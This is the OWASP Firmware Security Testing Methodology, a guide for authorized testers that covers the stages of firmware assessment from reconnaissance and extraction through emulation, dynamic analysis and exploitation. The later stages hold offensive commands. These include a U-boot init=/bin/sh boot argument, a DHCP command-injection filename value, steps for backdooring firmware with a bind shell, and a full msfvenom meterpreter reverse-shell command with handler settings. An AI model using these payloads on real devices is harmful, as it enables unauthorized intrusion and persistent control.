OWASP Firmware Security Testing Methodology
FSTM is composed of nine stages tailored to enable security researchers, software developers, hobbyists, and Information Security professionals with conducting firmware security assessments.
Last updated
FSTM is composed of nine stages tailored to enable security researchers, software developers, hobbyists, and Information Security professionals with conducting firmware security assessments.
Last updated
Whether network connected or standalone, firmware is the center of controlling any embedded device. As such, it is crucial to understand how firmware can be manipulated to perform unauthorized functions and potentially cripple the supporting ecosystem’s security. To get started with performing security testing and reverse engineering of firmware, use the following methodology as guidance when embarking on an upcoming assessment. The methodology is composed of nine stages tailored to enable security researchers, software developers, consultants, hobbyists, and Information Security professionals with conducting firmware security assessments.
The following sections will further detail each stage with supporting examples where applicable. Consider visiting the OWASP Internet of Things Project page and GitHub repository for the latest methodology updates and forthcoming project releases.
A preconfigured Ubuntu virtual machine (EmbedOS) with firmware testing tools used throughout this document can be downloaded via the following link. Details regarding EmbedOS’ tools can be found on GitHub within the following repository https://github.com/scriptingxss/EmbedOS.
During this stage, collect as much information about the target as possible to understand its overall composition underlying technology. Attempt to gather the following:
Supported CPU architecture(s)
Operating system platform
Bootloader configurations
Hardware schematics
Datasheets
Lines-of-code (LoC) estimates
Source code repository location
Third-party components
Open source licenses (e.g. GPL)
Changelogs
FCC IDs
Design and data flow diagrams
Threat models
Previous penetration testing reports
Bug tracking tickets (e.g. Jira and bug bounty platforms such as BugCrowd or HackerOne)
The above listed information should be gathered prior to security testing fieldwork via a questionnaire or intake form. Ensure to leverage internal product line development teams to acquire accurate and up to date data. Understand applied security controls as well as roadmap items, known security issues, and most concerning risks. If needed, schedule follow up deep dives on particular features in question. Assessments are most successful within a collaborative environment.
Where possible, acquire data using open source intelligence (OSINT) tools and techniques. If open source software is used, download the repository and perform both manual as well as automated static analysis against the code base. Sometimes, open source software projects already use free static analysis tools provided by vendors that provide scan results such as Coverity Scan and Semmle’s LGTM. For example, the screenshots below shows snippets of Das U-Boot’s Coverity Scan results.
Figure : U-Boot Coverity Scan
Figure : U-Boot Coverity Scan Analysis
Below are screenshots of Dropbear results from LGTM’s analysis.
Figure : LGTM Dropbear Alerts
Figure : LGTM Dropbear Results
With the information at hand, a light threat model exercise should be performed mapping attack surfaces and impact areas that show the most value in the event of compromise.
To begin reviewing firmware contents, the firmware image file must be acquired. Attempt to obtain firmware contents using one or more of the following methods:
Directly from the development team, manufacturer/vendor or client
Build from scratch using walkthroughs provided by the manufacturer
From the vendor's support site
Google dork queries targeted towards binary file extensions and file sharing platforms such as Dropbox, Box, and Google drive
It’s common to come across firmware images through customers who upload contents to forums, blogs, or comment on sites where they contacted the manufacturer to troubleshoot an issue and were given firmware via a zip or flash drive sent.
Man-in-the-middle (MITM) device communication during updates
*Download builds from exposed cloud provider storage locations such as Amazon Web Services (AWS) S3 buckets
Extract directly from hardware via UART, JTAG, PICit, etc.
Sniff serial communication within hardware components for update server requests
Via a hardcoded endpoint within the mobile or thick applications
Dumping firmware from the bootloader (e.g. U-boot) to flash storage or over the network via tftp
Removing the flash chip (e.g. SPI) or MCU from the board for offline analysis and data extraction (LAST RESORT).
You will need a supported chip programmer for flash storage and/or the MCU.
*Note: Ensure to follow local laws and regulations when downloading data from exposed cloud provider storage services.
Each of the listed methods vary in difficulty and should not be considered an exhaustive list. Select the appropriate method according to the project objectives and rules of engagement. If possible, request both a debug build and release build of firmware to maximize testing coverage use cases in the event debug code or functionality is compiled within a release.
Once the firmware image is obtained, explore aspects of the file to identify its characteristics. Use the following steps to analyze firmware file types, potential root filesystem metadata, and gain additional understanding of the platform it's compiled for.
Leverage utilities such as:
If none of the above methods provide any useful data, the following is possible:
Binary may be BareMetal
Binary may be for a real time operating system (RTOS) platform with a custom filesystem
Binary may be encrypted
If the binary may be encrypted, check the entropy using binwalk with the following command:
$ binwalk -E <bin>
Low entropy = Not likely to be encrypted
High entropy = Its likely encrypted (or compressed in some way).
Alternate tools are also available using Binvis online and the standalone application.
This stage involves looking inside firmware and parsing relative filesystem data to start identifying as many potential security issues as possible. Use the following steps to extract firmware contents for review of uncompiled code and device configurations used in following stages. Both automated and manual extractions methods are shown below.
Use the following tools and methods to extract filesystem contents:
$ binwalk -ev <bin>
Files will be extracts to " _binaryname/filesystemtype/
"
Filesystem types: squashfs, ubifs, romfs, rootfs, jffs2, yaffs2, cramfs, initramfs
2a. Sometimes, binwalk will not have the magic byte of the filesystem in its signatures. In these cases, use binwalk to find the offset of the filesystem and carve the compressed filesystem from the binary and manually extract the filesystem according to its type using the steps below.
2b. Run the following dd command carving the Squashfs filesystem.
Alternatively, the following command could also be run.
$ dd if=DIR850L_REVB.bin bs=1 skip=$((0x1A0094)) of=dir.squashfs
2c. For squashfs (used in the example above)
$ unsquashfs dir.squashfs
Files will be in "squashfs-root
" directory afterwards.
2d. CPIO archive files
$ cpio -ivd --no-absolute-filenames -F <bin>
2f. For jffs2 filesystems
$ jefferson rootfsfile.jffs2
2d. For ubifs filesystems with NAND flash
$ ubireader_extract_images -u UBI -s <start_offset> <bin>
$ ubidump.py <bin>
During this stage, clues are gathered for dynamic and runtime analysis stages. Investigate if the target firmware contains the following (non-exhaustive):
Legacy insecure network daemons such as telnetd (sometimes manufactures rename binaries to disguise )
Hardcoded credentials (usernames, passwords, API keys, SSH keys, and backdoor variants )
Hardcoded API endpoints and backend server details
Update server functionality that could be used as an entry point
Review uncompiled code and start up scripts for remote code execution
Extract compiled binaries to be used for offline analysis with a disassembler for future steps
Statically analyze filesystem contents and uncompiled code manually or leveraging automation tools such as firmwalker that parse the following:
etc/shadow and etc/passwd
list out the etc/ssl directory
search for SSL related files such as .pem, .crt, etc.
search for configuration files
look for script files
search for other .bin files
look for keywords such as admin, password, remote, AWS keys, etc.
search for common web servers used on IoT devices
search for common binaries such as ssh, tftp, dropbear, etc.
search for banned c functions
search for common command injection vulnerable functions
search for URLs, email addresses and IP addresses
and more…
The following subsections introduce open source automated firmware analysis tools.
Execute firmwalker within it’s directory in ~/tools/firmwalker and point firmwalker to the absolute path of the extracted filesystem’s root directory. Firmwalker uses information in the "/data/” directory for parsing rules. A custom fork modified by Aaron Guzman with additional checks can be found on GitHub at https://github.com/scriptingxss/firmwalker. The following examples show the usage of firmwalker used on OWASP’s IoTGoat. Additional vulnerable firmware projects are listed in the Vulnerable firmware section at the end of the document.
$ ./firmwalker.sh /home/embedos/firmware/ _IoTGoat-rpi-2.img.extracted/squashfs-root/
See the firmwalker output below.
Two files will be generated, firmwalker.txt and firmwalkerappsec.txt. These output files should be manually reviewed.
Fortunately, multiple open source automated firmware analysis tools are available. FACT features include the following:
Identification of software components such as operating system, CPU architecture, and third-party components along with their associated version information
Extraction of firmware filesystem (s ) from images
Detection of certificates and private keys
Detection of weak implementations mapping to Common Weakness Enumeration (CWE)
Feed & signature-based detection of vulnerabilities
Basic static behavioral analysis
Comparison (diff) of firmware versions and files
User mode emulation of filesystem binaries using QEMU
Detection of binary mitigations such as NX, DEP, ASLR, stack canaries, RELRO, and FORTIFY_SOURCE
REST API
and more...
Below are instructions for using firmware analysis comparison toolkit within the companion preconfigured virtual machine.
Tip: It is recommended to run FACT with a computer that has 16 Cores 64GB RAM although the tool can run with a minimum of 4 cores and 8GB of RAM at a much slower pace. Scan output results vary on the allocated resources given to the virtual machine. The more resources, the faster FACT will complete scan submissions.
Navigate to http://127.0.0.1:5000 in browser
Figure : FACT Dashboard
Upload firmware components to FACT for analysis. In the screenshot below, the compressed complete firmware with its root filesystem will be uploaded and analyzed.
Figure : FACT Upload
Depending on the hardware resources given to FACT, the analysis results will appear with its scan results upon a given time. This process can take hours if minimal resources are allocated.
Figure : FACT IoTGoat
Figure : FACT IoTGoat Exploit Mitigation Results
Disassemble suspect target binaries with data gathered from FACT using IDA Pro, Ghidra, Hopper, Capstone, or Binary Ninja. Analyze binaries for potential remote code execution system calls, strings, function lists, memory corruption vulnerabilities, and identify Xrefs to system() or alike function calls. Note potential vulnerabilities to use for upcoming steps.
The following screenshot shows the “shellback” binary disassembled using Ghidra.
Figure : Shellback Ghidra Analysis
Common binary analysis consist of reviewing the following:
Stack canaries enabled or disabled
$ readelf -aW bin/*| grep stack_chk_fail
$ mips-buildroot-linux-uclibc-objdump -d bin/binary | grep stack_chk_fail
Position-independent executable (PIE) enabled or disabled
PIE disabled
$ readelf -h <bin> | grep -q 'Type:[[:space:]]*EXEC'
PIE enabled
$ readelf -h <bin> | grep 'Type:[[:space:]]*DYN'
DSO
$ readelf -d <bin> | grep -q 'DEBUG'
Symbols
$ readelf --syms <bin>
$ nm <bin>
Recognizable strings
-el
specifies little-endian characters 16-bits wide (e.g. UTF-16).
Use -eb
for big endian
Prints any ASCII strings longer than 16 to stdout
The -t
flag will return the offset of the string within the file.
-tx
will return it in hex format, T-to in octal and -td
in decimal.
Useful for cross-referencing with a hex editor, or want to know where in the file your string is.
strings -n5 <bin>
strings -el <bin>
strings -n16 <bin>
strings -tx <bin>
Non-executable (NX) enabled or disabled
$ readelf -lW bin/<bin>| grep STACK
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4
The 'E' indicates that the stack is executable.
Relocations read-only (RELRO) configuration
Full RELRO:
$ readelf -d binary | grep BIND_NOW
Partial RELRO:
$ readelf -d binary | grep GNU_RELRO
A script that automates checking many of the above binary properties is checksec.sh. Below, are two examples of using the script.
Figure : Checksec.sh
For Microsoft binaries (EXE & DLL), use PESecurity to check for ASLR, DEP, SafeSEH, StrongNaming, Authenticode, Control Flow Guard, and HighEntropyVA.
EMBA is designed as a core firmware analysis tool for penetration testers. It supports the full security analysis process, starting with the firmware extraction, static analysis and dynamic analysis via emulation to generating a web-based report for further analysis. Launched with a single command, EMBA automatically discovers potential weak spots and vulnerabilities in the firmware under test, such as insecure binaries, old and outdated software components, potentially vulnerable scripts or hard-coded passwords.
EMBA features include the following:
Firmware extraction via a highly optimized extraction environment
Firmware extraction of not common systems (e.g. QNAP firmware, D'Link encrypted firmware, EnGenius encrypted firmware, VMDK files)
EMBA is not only Linux focused - also RTOS systems like VxWorks can be analyzed
Automatic extraction and analysis of docker containers
Identification of firmware details like operating system, CPU architecture, and third-party components along with their associated version information
User-mode emulation of filesystem binaries using QEMU to identify version details
Static analysis of filesystem binaries to identify version details
Version database with more than 600 version identifiers
Identification of known vulnerabilities and corresponding CVE's
Identification of public exploits, Metasploit modules and PoC's
Detection of certificates, private keys and password hashes
Detection of binary mitigations such as NX, DEP, ASLR, stack canaries, RELRO, and FORTIFY_SOURCE
Detection of legacy binary functions (e.g. strcpy)
Parallel execution for maximum performance
Pre-configured docker image is available and easy to install
Interactive HTML report for further tear down of the automated analysis
Web based enterprise environment via EMBArk
and more ...
System requirements:
EMBA is using multiple other tools in the background. The needed system resources depend a lot on the firmware you are going to analyse. Usually EMBA runs quite smooth in the following environment:
VMware running a current Kali Linux
RAM: minimum of 8GB-16GB
CPU: minimum of 4-8 cores
Storage: minimum of 30GB-100GB of free disk space
Classic installation
To install the necessary environment, you have to run the install script with root permissions:
You should use the -d
switch with the installer to run a typical installation. This will install needed dependencies (e.g. cve-search) on the host and will download the EMBA docker image. We recommend using this for the initial installation.
Usage of EMBA
After the installation process is finished, it is possible to use EMBA for firmware security analysis from the command line. Before starting EMBA please download a testing firmware like the OWASP IoTGoat firmware. The following command shows a typical EMBA command:
The shown command configures the following basic options:
-f - Firmware file
-l - Directory for logs
-p - Scan profile to use (located in ./scan-profiles)
Further options are available and can be viewed via ./emba.sh -h
The first step of every firmware test is a health check of the current installation:
After the health check was successful the analysis process starts with identification and extraction of the configured firmware:
While testing the firmware, all the results and the current status is shown live in the terminal. As a typical scan will run in threaded mode (-t
parameter), this output will be garbled and not very easy to read. For further analysis it is recommend to use the generated text based log files in the log directory and the web report (-W
parameter). After finishing the firmware scan, EMBA shows a summary of the results in the terminal:
Further results are available in the log directory and can be analyzed on the command line or via the web-browser:
The generated HTML report is self-contained and can be shared easily. Furthermore, this report is fully interactive and it is possible to reach all the testing details through the aggregated summary dashboard.
Further details are available on the official EMBA git repository.
EMBArk is the web based enterprise interface for the firmware security scanner EMBA. It is developed to provide the firmware security analyzer EMBA as a containerized service and to ease accessibility to the firmware scanning backend EMBA regardless of system and operating system.
Furthermore EMBArk improves the data provision by aggregating the various scanning results in an aggregated management dashboard.
On the details page of all scans you can access the detailed report of a firmware scan, start further tests and download the scan logs:
More details with the main results of each firmware test are available in the detailed report:
More information is available on the official EMBArk git repository.
Note: EMBArk is in a very early development stage.
Using details and clues identified in previous steps, firmware as well as it’s encapsulated binaries must be emulated to verify potential vulnerabilities. To accomplish emulating firmware, there are a few approaches listed below.
Partial emulation (user space) - Emulation of standalone binaries derived from a firmware's extracted filesystem such as /usr/bin/shellback
Full system emulation - Emulation of the full firmware and start up configurations leveraging fake NVRAM.
Emulation using a real device or virtual machine - At times, partial or full emulation may not work due to a hardware or architecture dependencies. If the architecture and endianness match a device owned such as a raspberry pie, the root filesystem or specific binary can be transferred to the device for further testing. This method also applies to pre built virtual machines using the same architecture and endianness as the target.
To begin partially emulating binaries, the CPU architecture and endianness must be known for selecting the appropriate QEMU emulation binary in the following steps.
el - little endian
eb - big endian
Binwalk can be used identify endianness for packaged firmware binaries (not from binaries within extracted firmware) using the command below.
After the CPU architecture and endianness have been identified, locate the appropriate QEMU binary to perform partial emulation (Not for emulating the full firmware, but binaries with the extracted firmware.)
Typically, in:
/usr/local/qemu-arch
or /usr/bin/qemu-arch
Copy the applicable QEMU binary into the extracted root filesystem. The second command shows copying the static arm QEMU binary to the extracted root filesystem within a ZSH shell showing the absolute path.
Execute the ARM binary (or appropriate arch) to emulate using QEMU and chroot with the following command:
$ sudo chroot . ./qemu-arch <binarytoemulate>
The following example shows Busybox emulated within a typical x64 architecture an attacker machine is likely using.
Below, is an example of emulating a service that listens on port 5515.
Also, the same service can be emulated with qiling framework.
In another terminal, check if the service is listening locally and try to connect to it with netcat.
Sometimes, requests are dispatched to the CGI binary by the HTTP server. By simply emulating the CGI binary, it's possible to analyze the process procedure or verify the vulnerability without setting up a HTTP server. The following example issues a GET request to a MIPS CGI binary.
With the target binary emulated, interact with its interpreter or listening service. Fuzz its application and network interfaces as noted in the next phase.
When possible, use automation tools such as firmadyne, firmware analysis toolkit, or ARM-X Firmware Emulation Framework to perform full emulation of firmware. These tools are essentially wrappers for QEMU and other environmental functions such as nvram.
Using firmware analysis toolkit, simply execute the following command:
Note: Modifications to these tools may be required if the firmware contains an uncommon compression, filesystem, or unsupported architecture.
In this stage, perform dynamic testing while a device is running in its normal or emulated environment. Objectives in this stage may vary depending on the project and level of access given. Typically, this involves tampering of bootloader configurations, web and API testing, fuzzing (network and application services), as well as active scanning using various toolsets to acquire elevated access (root) and/or code execution.
Tools that may be helpful are (non-exhaustive):
Burp Suite
OWASP ZAP
Commix
Fuzzers such as - American fuzzy loop (AFL)
Nmap
NCrack
Metasploit
Reference industry standard web methodologies such as OWASP’s Testing Guide and Application Security Verification Standard (ASVS).
Specific areas to review within an embedded device’s web application are the following:
Diagnostic or troubleshooting pages for potential command injection vulnerabilities
Authentication and authorization schemes are validated against the same framework across ecosystem applications as well as the firmware operating system platform
Test whether default usernames and passwords are used
Perform directory traversal and content discovery on web pages to identify debug or testing functionality
Asses SOAP/XML and API communication for input validation and sanitization vulnerabilities such as XSS and XXE
Fuzz application parameters and observe exceptions and stack traces
Tailor targeted payloads against embedded web application services for common C/C++ vulnerabilities such as memory corruption vulnerabilities, format string flaws, and integer overflows.
Depending on the product and its application interfaces, test cases will differ.
When modifying device start up and bootloaders such as U-boot, attempt the following:
Attempt to access the bootloaders interpreter shell by pressing "0", space or other identified “magic codes” during boot.
Modify configurations to execute a shell command such as adding 'init=/bin/sh
' at the end of boot arguments
#printenv
#setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3
mtdparts=sflash:<partitiionInfo> rootfstype=<fstype> hasEeprom=0 5srst=0 int=/bin/sh
#saveenv
#boot
Setup a tftp server to load images over the network locally from your workstation. Ensure the device has network access.
#setenv ipaddr 192.168.2.2 #local IP of the device
#setenv serverip 192.168.2.1 #tftp server IP
#saveenv
#reset
#ping 192.168.2.1 #check if network access is available
#tftp ${loadaddr} uImage-3.6.35 #loadaddr takes two arguments: the address to load the file into and the filename of the image on the TFTP server
Use ubootwrite.py
to write the uboot-image and push a modified firmware to gain root
Check for enabled debug features such as:
verbose logging
loading arbitrary kernels
booting from untrusted sources
*Use caution: Connect one pin to ground, watch device boot up sequence, before the kernel decompresses, short/connect the grounded pin to a data pin (DO) on an SPI flash chip
*Use caution: Connect one pin to ground, watch device boot up sequence, before the kernel decompresses, short/connect the grounded pin to pins 8 and 9 of the NAND flash chip at the moment U-boot decompresses the UBI image
*Review the NAND flash chip’s datasheet prior to shorting pins
Configure a rogue DHCP server with malicious parameters as input for a device to ingest during a PXE boot
Use Metasploit’s (MSF) DHCP auxiliary server and modify the ‘FILENAME
’ parameter with command injection commands such as ‘a";/bin/sh;#’
to test input validation for device startup procedures.
*Hardware security testing
Attempt to upload custom firmware and/or compiled binaries for integrity or signature verification flaws. For example, compile a backdoor bind shell that starts upon boot using the following steps.
Extract firmware with firmware-mod-kit (FMK)
Identify the target firmware architecture and endianness
Build a cross compiler with Buildroot or use other methods that suits your environment
Use cross compiler to build the backdoor
Copy the backdoor to extracted firmware /usr/bin
Copy appropriate QEMU binary to extracted firmware rootfs
Emulate the backdoor using chroot and QEMU
Connect to backdoor via netcat
Remove QEMU binary from extracted firmware rootfs
Repackage the modified firmware with FMK
Test backdoored firmware by emulating with firmware analysis toolkit (FAT) and connecting to the target backdoor IP and port using netcat
If a root shell has already been obtained from dynamic analysis, bootloader manipulation, or hardware security testing means, attempt to execute precompiled malicious binaries such as implants or reverse shells. Consider using automated payload/implant tools used for command and control (C&C) frameworks. For example, Metasploit framework and ‘msfvenom’ can be leveraged using the following steps.
Identify the target firmware architecture and endianness
Use msfvenom
to specify the appropriate target payload (-p), attacker host IP (LHOST=), listening port number (LPORT=) filetype (-f), architecture (--arch), platform (--platform linux or windows), and the output file (-o). For example, msfvenom -p linux/armle/meterpreter_reverse_tcp LHOST=192.168.1.245 LPORT=4445 -f elf -o meterpreter_reverse_tcp --arch armle --platform linux
Transfer the payload to the compromised device (e.g. Run a local webserver and wget/curl the payload to the filesystem) and ensure the payload has execution permissions
Prepare Metasploit to handle incoming requests. For example, start Metasploit with msfconsole and use the following settings according to the payload above: use exploit/multi/handler,
set payload linux/armle/meterpreter_reverse_tcp
set LHOST 192.168.1.245 #attacker host IP
set LPORT 445 #can be any unused port
set ExitOnSession false
exploit -j -z
Execute the meterpreter reverse 🐚 on the compromised device
Watch meterpreter sessions open
Perform post exploitation activities
If possible, identify a vulnerability within startup scripts to obtain persistent access to a device across reboots. Such vulnerabilities arise when startup scripts reference, symbolically link, or depend on code located in untrusted mounted locations such as SD cards, and flash volumes used for storage data outside of root filesystems.
Runtime analysis involves attaching to a running process or binary while a device is running in its normal or emulated environment. Basic runtime analysis steps are provided below:
sudo chroot . ./qemu-arch -L <optionalLibPath> -g <gdb_port> <binary>
Attach gdb-multiarch or use IDA to emulate the binary
Set breakpoints for functions identified during step 4 such as memcpy, strncpy, strcmp, etc.
Execute large payload strings to identify overflows or process crashes using a fuzzer
Move to step 8 if a vulnerability is identified
Tools that may be helpful are (non-exhaustive):
gdb-multiarch
Frida
ptrace
strace
IDA Pro
Ghidra
Binary Ninja
Hopper
After identifying a vulnerability within a binary from previous steps, a proper proof-of-concept (PoC) is required to demonstrate the real-world impact and risk. Developing exploit code requires programming experience in lower level languages (e.g. ASM, C/C++, shellcode, etc.) as well as background within the particular target architecture (e.g. MIPS, ARM, x86 etc.). PoC code involves obtaining arbitrary execution on a device or application by controlling an instruction in memory.
It is not common for binary runtime protections (e.g. NX, DEP, ASLR, etc.) to be in place within embedded systems however when this happens, additional techniques may be required such as return oriented programming (ROP). ROP allows an attacker to implement arbitrary malicious functionality by chaining existing code in the target process/binary's code known as gadgets. Steps will need to be taken to exploit an identified vulnerability such as a buffer overflow by forming a ROP chain. A tool that can be useful for situations like these is Capstone's gadget finder or ROPGadget- https://github.com/JonathanSalwan/ROPgadget.
Utilize the following references for further guidance:
A combination of tools will be used throughout assessing firmware. Listed below, are commonly used tools.
To practice discovering vulnerabilities in firmware, use the following vulnerable firmware projects as a starting point.
OWASP IoTGoat
The Damn Vulnerable Router Firmware Project
Damn Vulnerable ARM Router (DVAR)
Azeria Labs VM 2.0
Damn Vulnerable IoT Device (DVID)
Feedback and contributing
If you would like to contribute or provide feedback to improve this methodology, contact Aaron.guzman@owasp.org (@scriptingxss). Make sure to open up an issue or a pull request, and we'll make sure to tend to it!
Special thanks to our sponsors Cisco Meraki, OWASP Inland Empire, and OWASP Los Angeles as well as José Alejandro Rivas Vidal for his careful review.
The full list of contributors can be found via https://github.com/scriptingxss/owasp-fstm/graphs/contributors.
License
Creative Commons Attribution Share Alike 4.0 International
Stage
Description
1. Information gathering and reconnaissance
Acquire all relative technical and documentation details pertaining to the target device's firmware
2. Obtaining firmware
Attain firmware using one or more of the proposed methods listed
3. Analyzing firmware
Examine the target firmware's characteristics
4. Extracting the filesystem
Carve filesystem contents from the target firmware
5. Analyzing filesystem contents
Statically analyze extracted filesystem configuration files and binaries for vulnerabilities
6. Emulating firmware
Emulate firmware files and components
7. Dynamic analysis
Perform dynamic security testing against firmware and application interfaces
8. Runtime analysis
Analyze compiled binaries during device runtime
9. Binary Exploitation
Exploit identified vulnerabilities discovered in previous stages to attain root and/or code execution